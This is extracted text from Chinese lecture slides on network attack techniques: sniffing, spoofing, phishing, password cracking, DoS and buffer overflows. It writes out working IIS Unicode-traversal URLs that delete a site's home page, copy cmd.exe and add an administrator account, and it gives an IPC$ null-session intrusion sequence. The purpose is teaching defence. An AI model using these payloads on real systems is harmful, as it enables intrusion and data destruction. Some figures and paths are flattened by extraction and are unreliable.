安全与支付4网络攻击技术.ppt

1、安全与支付,第4讲 网络攻击技术,网络攻击技术,主要内容 网络监听攻击 口令攻击 扫描攻击 欺骗攻击 漏洞利用攻击 拒绝服务攻击,监听攻击,网络监听 网络监听指的是利用计算机的网络接口捕获网络上传输的目的地址为其它计算机的数据报文。 网络监听工具也常称作嗅探器，Sniffer pro就是一个功能完善的网络监听工具 监听攻击就是利用嗅探器来收集网络上传输的敏感信息 正在传输的用户名或信用卡号、密码 各种非共享机密数据 通信主机的接口地址、TCP连接的字节顺序号码,以太网监听原理,在以太网局域网中一台计算机与其他计算机进行数据交换的时候，本局域网中的所有计算机都会收到数据包，但只有与数据包中目标地

2、址一致的那台主机才会接收和处理数据包，其它的机器都会将包丢弃。但是，当主机工作在监听模式下时，无论接收到的数据包中目标地址是什么，主机都将其接收下来。然后对数据包进行分析，就得到了局域网中通信的数据。 嗅探器（Sniffer）就是将网卡设置为混杂模式，目的是使网络接口处于监听状态，从而可接收网络上传输的每一个数据包。,网络监听,常用Sniffer工具 除了非常著名的监听软件Sniffer Pro外，还有一些常用的监听软件： Unix、Linux： Sniffit、 Tcpdump Windows系统: Iris、 Network Monitor 免费Ethereal：http:/ 密码监听工具

3、 Win Sniffer：监听局域网内密码pswmonitor：监听Web邮箱密码、POP3邮箱密码、Ftp登录密码等,8,如何发现和防范sniffer,网络通讯掉包率反常的高。 网络带宽将出现异常。 对于怀疑运行监听程序的主机，用正确的IP地址和错误的物理地址去PING，正常的机器不接受错误的物理地址，处于监听状态的机器能接受，这种方法依赖系统的IPSTACK，对有些系统可能行不通。往网上发大量包含着不存在的物理地址的包 ,由于监听程序将处理这些包，将导致性能下降，通过比较前后该机器性能（icmp echo delay等方法）加以判断,9,如何发现和防范sniffer,2对网络监听的防范措施

4、 从逻辑或物理上对网络分段其目的是将非法用户与敏感的网络资源相互隔离，从而防止可能的非法监听。以交换式集线器代替共享式集线器，使单播包仅在两个节点之间传送，从而防止非法监听。（3）使用加密技术 数据经过加密后，通过监听仍然可以得到传送的信息,但显示的是乱码。 （4）划分VLAN 运用VLAN（虚拟局域网）技术，将以太网通信变为点到点通信，可以防止大部分基于网络监听的入侵。,欺骗攻击,IP欺骗 伪造他人的源IP地址，利用正常信任关系发动的攻击 ARP欺骗 伪造IP地址和MAC地址的对应关系 DNS欺骗 让DNS服务器的缓存中存在错误的IP地址映射 Web欺骗（钓鱼攻击） 假冒的web站点，骗取用

5、户的机密信息 如04年10月发生的“网络银行”欺诈(网络钓鱼攻击),IP欺骗攻击,IP欺骗攻击,13,IP欺骗的防止,（1）抛弃基于地址的信任策略 （2）进行包过滤 （3）使用加密方法 （4）使用随机化的初始序列号,DNS欺骗攻击,DNS欺骗攻击,DNS特性 DNS对其本身无法解析的域名会自动向其他DNS服务器查询 为提高效率DNS会将查询结果存入缓存 DNS欺骗的基本思路 让DNS服务器的缓存中存有错误的IP地址映射 攻击者要做两件事： 伪造一个用户的DNS请求 伪造一个查询应答,DNS欺骗攻击,网络钓鱼攻击,网络钓鱼(Phishing)一词，是“Fishing”和“Phone”的综合体，由

6、于黑客始祖起初是以电话作案，所以用“Ph”来取代“F”，创造了”Phishing” 攻击者利用欺骗性的电子邮件和伪造的Web站点来进行诈骗活动，诱骗访问者提供一些个人信息，如信用卡号、账户和口令、社保编号等内容（通常主要是那些和财务，账号有关的信息，以获取不正当利益），受骗者往往会泄露自己的机密数据,网络钓鱼攻击,钓鱼者入侵初级服务器，窃取用户的名字和邮件地址 钓鱼者发送有针对性质的邮件 受害用户访问假冒网站 受害用户提供秘密，用户信息被钓鱼者取得 钓鱼者使用受害用户的身份进入其他网络服务器,如04年10月发生的“网络银行”欺诈(网络钓鱼攻击) 工行： 中国：www.bank-of-,漏洞攻击

7、,利用已发现的系统或应用软件实现上的漏洞攻击系统 操作系统或应用软件不可避免存在漏洞 Windows 3.1 300万行代码 Windows 2000 5000万行代码 通过及时为系统安装补丁程序，就可以消除系统漏洞。只要是针对漏洞进行攻击的案例都依赖于系统是否打了相关的补丁。,漏洞攻击,实例：微软IIS服务器的Unicode漏洞攻击：Unicode漏洞是2000-10-17发布的，受影响的版本： Microsoft IIS 5.0 + Microsoft Windows 2000系列版本 Microsoft IIS 4.0 + Microsoft Windows NT 4.0消除该漏洞的方式

8、是安装操作系统的补丁，只要安装了SP1以后，该漏洞就不存在了。微软IIS 4.0和5.0都存在利用扩展UNICODE字符取代“/”和“”，而能利用“/“目录遍历的漏洞,漏洞攻击,Unicode漏洞的检测方法： 使用扫描工具来检测Unicode漏洞是否存在，用前面介绍的X-Scan来对目标系统进行扫描，目标主机IP为： 172.18.25.109 ，Unicode漏洞属于IIS漏洞，所以这里只扫描IIS漏洞就可以 只要是/scripts开头的漏洞都是Unicode漏洞。如下面的扫描结果，就显示此服务器有Unicode 漏洞 /script/%c1%1c/%c1%1c/%c1%1c/winnt/s

9、ystem32/cmd.exe?/c+dir%20c:(HTTP: 200 ),漏洞攻击,漏洞攻击,其中/scripts目录是IIS提供的可以执行命令的一个有执行程序权限的一个目录， scripts目录一般系统盘根目录下的Inetpub目录下， C:InetputScript C:Inetputwwwroot 在Windows的目录结构中，可以使用两个点和一个斜线“/”来访问上一级目录，在浏览器中利用“scripts/”可以访问到系统盘根目录，访问“scripts/winnt/system32”就访问到系统的系统目录了，在system32目录下包含许多重要的系统文件，比如cmd.exe文件，可

10、以利用该文件新建用户，删除文件等操作。,漏洞攻击,浏览器地址栏中禁用符号“/”，但是可以使用符号“/”的Unicode的编码。比如 “/scripts/%c0%2f/winnt/system32/cmd.exe?/c+dir”中的“%c0%2f”就是“/”的Unicode编码。这条语句是执行dir命令列出目录结构。 利用该漏洞读取出计算机上目录列表，比如读取C盘的目录，只要在浏览器中输入 “http:/172.18.25.109/scripts/%c0%2f/winnt/system32/cmd.exe?/c+dir+c:” 得到如下结果：,漏洞攻击,漏洞攻击,利用Unicode漏洞删除主页：

11、 利用Unicode可以方便的更改对方的主页，比如现在已经知道对方网站的根路径在“C:Initpubwwwroot”（系统默认）下，可以删除该路径下的文件“default.asp”来删除主页，这里“default.asp”文件是IIS的默认启动页面 使用的语句是： http:/172.18.25.109/scripts/%c0%2f/winnt/system32/cmd.exe?/c+del+c:inetpubwwwrootdefault.asp,漏洞攻击,利用Unicode漏洞拷贝文件： 为了是使用方便，利用语句将cmd.exe文件拷贝到scripts目录，并改名为c.exe，使用的语句是：

12、 http:/172.18.25.109/scripts/%c0%2f/winnt/system32/cmd.exe?/c+copy+C:winntsystem32cmd.exe+c.exe 程序执行结果如图所示。,漏洞攻击,利用Unicode漏洞入侵系统 ： 在浏览器地址栏上执行命令，用户的权限比较低，像net等系统管理指令不能执行。利用Unicode漏洞在对方系统建立管理员账号 可以通过下面一系列操作在对方主机创建一个有管理员权限的用户 http:/192.168.0.136/scripts/%c0%2f/winnt/system32/cmd.exe?/c+echo+net+user+ha

13、cker+1234+/add+ c:inetpubscriptshack.bat http:/192.168.0.136/scripts/%c0%2f/winnt/system32/cmd.exe?/c+echo+net+user+hacker+/active:yes+ c:inetpubscriptshack.bat,漏洞攻击,然后通过以下方式运行hack.bat文件 http:/192.168.0.136/scripts/%c0%2f/winnt/system32/cmd.exe?/c+c:inetpubscriptshack.bat选择打开，通过以上4步则在服务器上添加了一个管理员权限用

14、户hacker，密码是1234,口令攻击,口令攻击是指把口令破解出来、获取口令、或者让口令保护失效。 主要技术： 字典攻击 暴力攻击 其它方法 嗅探分析 木马窃取 社交欺骗,口令攻击,字典攻击 攻击者基于某些知识构造口令字符串，生成口令字典，然后利用字典里的这些可能的字符串来测试密码 目的是缩小尝试的范围，高效快速的得到系统的密码。 一个字典文件本身就是一个标准的文本文件，其中的每一行就代表一个可能的密码。,口令攻击,口令字典的构造方法,口令攻击,暴力攻击： 通过穷举的方法，使用所有可能口令的字符组合逐一测试，也称穷举攻击。 比如先从字母a尝试，尝试aa、ab、ac然后再尝试aaa、aab、a

15、ac 实例： 利用软件GetNTUser破解密码，如图：,口令攻击,口令攻击,口令攻击软件,口令攻击,口令攻击软件,37,设置安全的口令,在一个安全的口令里应该包含大小写字母、数字、标点、空格、控制符等，另外口令越长，攻击的难度越大。 假设每秒钟测试一百万次，用小写字母组成的4字符口令，穷举攻击需要的最大次数为264，穷举搜索仅需要0.5秒； 由所有可输入字符构成的4字符口令，则需要958次穷举，搜索需要的时间为1.4分钟， 而8字符口令，则要958次穷举，搜索需要的时间为210年。 随着硬件速度的不断提高以及互联网强大的分布计算能力，口令很难真正抵抗住穷举攻击的威胁。 许多人设置口令时喜欢使

16、用生日、名字、电话号码、身份证号码、地名、常用单词等，这样的口令固然便于记忆，但安全性极差。字典攻击对于这样的弱口令很奏效。,38,设置安全的口令,口令的选择：字母数字及标点的组合，如：Ha,Ppy!和w/(X,y)*;使用一句话的开头字母做口令，如：由A fox jumps over a lazy dog!产生口令AfJoAld!。 口令的保存：记住、放到安全的地方，加密最好。 口令的使用：输入口令不要让别人看到；不要在不同的系统上使用同一口令；定期改变口令。,39,一次性口令,（OTP，One-Time Password）。 一个口令仅使用一次，能有效地抵制重放攻击 OTP的主要思路是：在

17、登录过程中加入不确定因素，使每次登录过程中的生成的口令不相同。 口令列表，每次登录使用完一个口令后就将它从列表明中删除； 用户也可以使用IC卡或其他的硬件卡来存储用户的秘密信息，这些信息再随机数、系统时间等参数一起通过散列得到一个一次性口令。,拒绝服务攻击,DoS-Denial of Service：凡是能导致合法用户不能够访问正常网络服务的行为都是“拒绝服务攻击”。 DoS最主要的目的是：造成被攻击服务器资源耗尽或系统崩溃而无法提供服务。服务本身无伤害；可使提供服务的信任度下降，影响公司的声誉以及用户对网络服务的使用。 常见的DoS攻击： 带宽攻击：以极大的通信量冲击网络，使网络所有可用的带

18、宽都 被消耗掉。 连通性攻击：用大量的连接请求冲击计算机，最终导致计算机无 法响应和处理合法用户的请求。 单一的DoS攻击一般是采用一对一的方式，当攻击的计算机CPU速度低、内存小或网络带宽小等各项性能指标不高时，效果是明显的。,DoS 攻击的分类,以消耗目标主机的可用资源为目的（例如：死亡之ping、SYN攻击、Land攻击、泪珠攻击等） 以消耗服务器链路的有效带宽为目的（例如：蠕虫）,攻击者,目标主机,等待应答,SYN：同步 SYN/ACK:同步/确认 ACK：确认,SYN攻击的原理（1）,攻击者,目标主机,1,n,等待ACK应答,不应答,不应答,重新发送,SYN攻击的原理（2）,以Win

19、dows 为例SYN攻击,死亡之ping SYN Flood Land攻击 泪珠（Teardrop）攻击,行行色色的DoS攻击,1)攻击者攻击诸客户主机以求分析他们的安全水平和脆弱性。,攻击者,各种客户主机,目标系统,2)攻击者进入其已经发现的最弱的客户主机之内(“肉鸡”)，并且秘密地安置一个其可远程控制的代理程序(端口监督程序demon)。,攻击准备：,安置代理,代理程序,DDoS (分布式拒绝服务)攻击（1）,3)攻击者使他的全部代理程序同时发送由残缺的数字包构成的连接请求送至目标系统。,攻击者,目标系统,发起攻击：,指令,攻击的代理程序,4)包括虚假的连接请求在内的大量残缺的数字包攻击目

20、标系统，最终将导致它因通信淤塞而崩溃。,虚假的连接请求,DDoS (分布式拒绝服务)攻击（2）,DDoS和DoS小结,DDoS的攻击策略侧重于通过很多“僵尸主机”（被攻击者入侵过或可间接利用的主机）向受害主机发送大量看似合法的网络包，从而造成网络阻塞或服务器资源耗尽而导致拒绝服务，分布式拒绝服务攻击一旦被实施，攻击网络包就会犹如洪水般涌向受害主机，从而把合法用户的网络包淹没，导致合法用户无法正常访问服务器的网络资源，因此，拒绝服务攻击又被称之为“洪水式攻击”，常见的DDoS攻击手段有SYN Flood、ACK Flood、UDP Flood、ICMP Flood、TCP Flood、Conne

21、ctions Flood、Script Flood、Proxy Flood等； DoS则侧重于通过对主机特定漏洞的利用攻击导致网络栈失效、系统崩溃、主机死机而无法提供正常的网络服务功能，从而造成拒绝服务，常见的DoS攻击手段有TearDrop、Land、Jolt、IGMP Nuker、Boink、Smurf、Bonk、OOB等。,缓冲区溢出（buffer overflow)攻击,从一个对话框说起,认识缓冲区溢出,【引例】把1升的水注入容量为0.5升的容量中 第一次大规模的缓冲区溢出攻击是发生在1988年的Morris蠕虫，它造成了6000多台机器被瘫痪，损失在$100 000至$10 000

22、000之间，利用的攻击方法之一就是fingerd的缓冲区溢出。 缓冲区溢出攻击已经占了网络攻击的绝大多数，据统计，大约80%的安全事件与缓冲区溢出攻击有关。,流行的缓冲区溢出攻击病毒,(1)冲击波 利用漏洞：RPC缓冲区溢出 135/TCP (2)震荡波 利用漏洞：LSASS漏洞 1025/TCP (3)极速波 利用漏洞：UPNP漏洞 445/TCP (4)高波 利用多种漏洞,非常危险,恶意代码攻击,病毒 寄生、感染、破坏性的代码 特洛依木马 包含某种恶意行为的程序 蠕虫 利用系统或软件漏洞，自行扩散、自我复制 混合体 病毒蠕虫，蠕虫木马等,攻击基本步骤,搜集情报 判断目标主机所使用的操作系统

23、 、开放的网络服务以及相关的配置信息等 检测漏洞 利用收集到的目标信息，进一步分析该系统的安全漏洞 实施攻击 进一步发现被攻破系统在网络中的信任关系 在目标系统中安装探测器软件 在被攻破系统上获得了特权用户权限 扫尾工作 在被攻破的系统上建立后门 安装代理，作为攻击其它机器的跳板 清除日志，毁掉入侵痕迹,利用IPC漏洞和空会话攻击举例,空会话是指计算机连接到另一台计算机时不需要身份验证，又称为“匿名连接”。 要求对方TCP端口139或445已经打开 建立空会话后，可以使用net view查看远程系统上的共享资源 IPC指进程间通讯，windows默认逻辑共享C$、D$、IPC$、admin$,

24、利用IPC漏洞和空会话攻击举例,利用“流光”扫描IP地址为192.168.0.136的主机，从而入侵该机器。,利用IPC漏洞和空会话攻击举例,从扫描报告中得知管理员的用户名administrator，密码为空 系统开放共享IPC$、admin$、C$、D$ 利用侦测到的被攻击服务器的管理员用户名和密码 利用net命令连接被攻击服务器,利用IPC漏洞和空会话攻击举例,还可以 Net view 192.168.0.136查看共享资源 Net time 192.168.0.136 Net user 建立用户 上载木马程序 运行木马程序 telnet 192.168.0.136 99 ,防御策略,1、增强防护意识，避免下载安装不熟悉软件； 2、使用强壮的密码； 3、及时更新及安装补丁 下载安装最新补丁，修补最新漏洞 开启Windows自动更新服务 4、安装防火墙产品。,